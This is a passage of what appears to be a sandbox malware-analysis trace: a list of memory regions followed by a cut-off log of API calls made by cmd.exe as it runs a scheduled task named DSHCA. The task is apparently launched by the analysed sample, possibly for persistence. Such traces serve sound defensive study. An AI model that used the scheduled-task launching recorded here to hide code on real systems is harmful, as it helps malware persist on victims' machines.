"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9560 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9561 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 9562 start_va = 0xef0000 end_va = 0xef1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 9573 start_va = 0x1030000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 9574 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9575 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9576 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9577 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9578 start_va = 0x1040000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 9579 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9580 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9581 start_va = 0xd40000 end_va = 0xd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 9582 start_va = 0x7f060000 end_va = 0x7f15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f060000" filename = "" Region: id = 9919 start_va = 0xf00000 end_va = 0xfbdfff entry_point = 0xf00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9920 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9921 start_va = 0xfc0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 9922 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 9923 start_va = 0x5420000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 9924 start_va = 0x7f188000 end_va = 0x7f18afff entry_point = 0x0 region_type = private name = "private_0x000000007f188000" filename = "" Region: id = 9925 start_va = 0xd50000 end_va = 0xd53fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 10015 start_va = 0xd60000 end_va = 0xd63fff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 10045 start_va = 0x5560000 end_va = 0x5896fff entry_point = 0x5560000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 979 os_tid = 0x1a0 [0296.253] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0296.253] __set_app_type (_Type=0x1) [0296.253] __p__fmode () returned 0x77984d6c [0296.253] __p__commode () returned 0x77985b1c [0296.253] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0296.254] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0296.254] GetCurrentThreadId () returned 0x1a0 [0296.254] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1a0) returned 0x84 [0296.254] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.254] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0296.254] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.271] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0296.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfce4 | out: phkResult=0xecfce4*=0x0) returned 0x2 [0296.271] VirtualQuery (in: lpAddress=0xecfceb, lpBuffer=0xecfc9c, dwLength=0x1c | out: lpBuffer=0xecfc9c*(BaseAddress=0xecf000, AllocationBase=0xdd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.271] VirtualQuery (in: lpAddress=0xdd0000, lpBuffer=0xecfc9c, dwLength=0x1c | out: lpBuffer=0xecfc9c*(BaseAddress=0xdd0000, AllocationBase=0xdd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0296.271] VirtualQuery (in: lpAddress=0xdd1000, lpBuffer=0xecfc9c, dwLength=0x1c | out: lpBuffer=0xecfc9c*(BaseAddress=0xdd1000, AllocationBase=0xdd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0296.271] VirtualQuery (in: lpAddress=0xdd3000, lpBuffer=0xecfc9c, dwLength=0x1c | out: lpBuffer=0xecfc9c*(BaseAddress=0xdd3000, AllocationBase=0xdd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.271] VirtualQuery (in: lpAddress=0xed0000, lpBuffer=0xecfc9c, dwLength=0x1c | out: lpBuffer=0xecfc9c*(BaseAddress=0xed0000, AllocationBase=0xed0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0296.271] GetConsoleOutputCP () returned 0x1b5 [0296.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.285] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0296.285] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.285] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0296.288] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.288] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.294] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.294] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.297] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.297] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.301] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.301] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0296.306] GetEnvironmentStringsW () returned 0x10b7e80* [0296.307] FreeEnvironmentStringsA (penv="=") returned 1 [0296.307] GetEnvironmentStringsW () returned 0x10b7e80* [0296.307] FreeEnvironmentStringsA (penv="=") returned 1 [0296.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xecec48 | out: phkResult=0xecec48*=0x94) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x0, lpData=0xecec54*=0x2d, lpcbData=0xecec50*=0x1000) returned 0x2 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x1, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x0, lpData=0xecec54*=0x1, lpcbData=0xecec50*=0x1000) returned 0x2 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x0, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x40, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x40, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x0, lpData=0xecec54*=0x40, lpcbData=0xecec50*=0x1000) returned 0x2 [0296.307] RegCloseKey (hKey=0x94) returned 0x0 [0296.307] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xecec48 | out: phkResult=0xecec48*=0x94) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x0, lpData=0xecec54*=0x40, lpcbData=0xecec50*=0x1000) returned 0x2 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x1, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x0, lpData=0xecec54*=0x1, lpcbData=0xecec50*=0x1000) returned 0x2 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x0, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x9, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x4, lpData=0xecec54*=0x9, lpcbData=0xecec50*=0x4) returned 0x0 [0296.307] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xecec4c, lpData=0xecec54, lpcbData=0xecec50*=0x1000 | out: lpType=0xecec4c*=0x0, lpData=0xecec54*=0x9, lpcbData=0xecec50*=0x1000) returned 0x2 [0296.307] RegCloseKey (hKey=0x94) returned 0x0 [0296.307] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432b0 [0296.307] srand (_Seed=0x5bb432b0) [0296.307] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Run /I /tn DSHCA" [0296.308] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Run /I /tn DSHCA" [0296.308] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.308] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10b7e88, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0296.308] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0296.308] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.308] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.308] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.308] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0296.308] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0296.308] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0296.308] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0296.308] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0296.308] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0296.308] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0296.308] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0296.308] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0296.310] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xecfa20 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.310] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xecfa20, lpFilePart=0xecfa18 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xecfa18*="Desktop") returned 0x1d [0296.310] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0296.629] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xecf7a0 | out: lpFindFileData=0xecf7a0) returned 0x10b9ef0 [0296.629] FindClose (in: hFindFile=0x10b9ef0 | out: hFindFile=0x10b9ef0) returned 1 [0296.630] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xecf7a0 | out: lpFindFileData=0xecf7a0) returned 0x10b9ef0 [0296.630] FindClose (in: hFindFile=0x10b9ef0 | out: hFindFile=0x10b9ef0) returned 1 [0296.630] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0296.630] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xecf7a0 | out: lpFindFileData=0xecf7a0) returned 0x10b9ef0 [0296.630] FindClose (in: hFindFile=0x10b9ef0 | out: hFindFile=0x10b9ef0) returned 1 [0296.630] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0296.630] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0296.630] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0296.630] GetEnvironmentStringsW () returned 0x10b8098* [0296.631] FreeEnvironmentStringsA (penv="=") returned 1 [0296.631] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.631] GetConsoleOutputCP () returned 0x1b5 [0296.768] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.768] GetUserDefaultLCID () returned 0x409 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xecfb50, cchData=128 | out: lpLCData="0") returned 2 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xecfb50, cchData=128 | out: lpLCData="0") returned 2 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xecfb50, cchData=128 | out: lpLCData="1") returned 2 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0296.768] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0296.768] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0296.769] GetConsoleTitleW (in: lpConsoleTitle=0x10b80e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0296.831] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.831] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0296.831] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0296.832] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0296.832] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0296.832] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0296.832] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0296.832] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0296.832] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0296.832] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0296.832] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0296.833] GetConsoleTitleW (in: lpConsoleTitle=0xecf838, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0296.834] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0296.834] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0296.834] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0296.834] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0296.834] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0296.834] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0296.834] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0296.834] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0296.834] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0296.834] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0296.834] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0296.834] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0296.834] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0296.834] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0296.834] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0296.834] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0296.834] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0296.834] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0296.834] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0296.834] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0296.834] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0296.834] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0296.834] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0296.834] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0296.834] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0296.834] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0296.834] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0296.834] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0296.834] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0296.834] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0296.834] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0296.834] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0296.834] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0296.834] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0296.834] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0296.834] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0296.834] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0296.834] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0296.834] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0296.834] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0296.834] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0296.834] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0296.834] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0296.834] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0296.835] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0296.835] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0296.835] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0296.835] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0296.835] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0296.835] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0296.835] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0296.835] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0296.835] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0296.835] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0296.835] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0296.835] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0296.835] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0296.835] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0296.835] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0296.835] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0296.835] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0296.835] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0296.835] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0296.835] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0296.835] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0296.835] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0296.835] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0296.835] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0296.835] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0296.835] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0296.835] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0296.835] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0296.835] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0296.835] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0296.835] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0296.835] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0296.835] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0296.835] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0296.835] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0296.835] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0296.835] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0296.835] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0296.835] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0296.835] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0296.835] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0296.835] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0296.835] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0296.836] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0296.836] SetErrorMode (uMode=0x0) returned 0x0 [0296.836] SetErrorMode (uMode=0x1) returned 0x0 [0296.836] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x10b8620, lpFilePart=0xecf344 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xecf344*="Desktop") returned 0x1d [0296.836] SetErrorMode (uMode=0x0) returned 0x1 [0296.836] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0296.836] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0296.841] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.842] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0xecf0d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xecf0d0) returned 0xffffffff [0296.842] GetLastError () returned 0x2 [0296.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.842] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0xecf0d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xecf0d0) returned 0xffffffff [0296.842] GetLastError () returned 0x2 [0296.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.842] FindFirstFileExW (in: 